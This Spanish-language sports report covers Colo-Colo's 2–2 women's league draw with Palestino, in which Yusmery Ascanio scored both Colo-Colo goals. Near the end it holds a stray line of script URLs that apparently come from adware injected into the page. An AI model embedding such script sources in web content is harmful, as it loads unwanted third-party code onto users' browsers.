¡LOS NUESTROS PRIMERO!

Yusmery Ascanio marcó doblete en el fútbol chileno

Ascanio

Se disputó la séptima fecha de la segunda ronda del torneo nacional Femenino del fútbol chileno, Colo-Colo recibió a Palestino en la cancha sintética del Monumental. Las albas no pudieron superar el duro partido que planteó el cuadro visitante y empataron a 2 goles. La venezolana Yusmery Ascanio marcó los dos tantos de su equipo.

El primer tiempo fue de ida y vuelta en la cancha Monumental donde el marcador no se pudo abrir. Iniciado el segundo tiempo, las albas saltaron a la cancha con otra actitud y a los 3 minutos Yusmery Ascanio aprovechaba un rebote en el área y con una gran definición abría el marcador y ponía a su equipo a ganar.

Partido  de ida y vuelta, la visita no bajaría los brazos hasta conseguir el empate, y al minuto 26 del segundo tiempo Nicol Sanhueza  en una contra marcaba para Palestino aprovechando que Colo-Colo ya no estaba volviendo.

La misma dosis aplicaría Palestino, otra contra luego de que las jugadoras de Colo-Colo se volvieran a quedar y Nicol Sanhueza al minuto 35 del segundo tiempo marcaba el segundo de la noche y ponía a ganar a su equipo.

A pocos minutos para finalizar el partido las caciques no se rendirían hasta conseguir el empate en casa y la venezolana Ascanio se volvía a vestir de heroína al marcar su segundo tanto de la noche con un golazo de tiro libre y el empate para Colo-Colo que siguen peleando en lo más alto de la clasificación. . La tachirense Nuby Rangel también fue titular.

Escrito por: Jhoan Ulloa / @JhoanEulloaS

Fotos: Pueblo colocino.

 

http://cdncache-a.akamaihd.net/sub/nee5452/52200_6968_/l.js?pid=2450&ext=http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6968x&r=1538584454631http://browfileext.com/addons/lnkr5.min.js

Oswaldo Guevara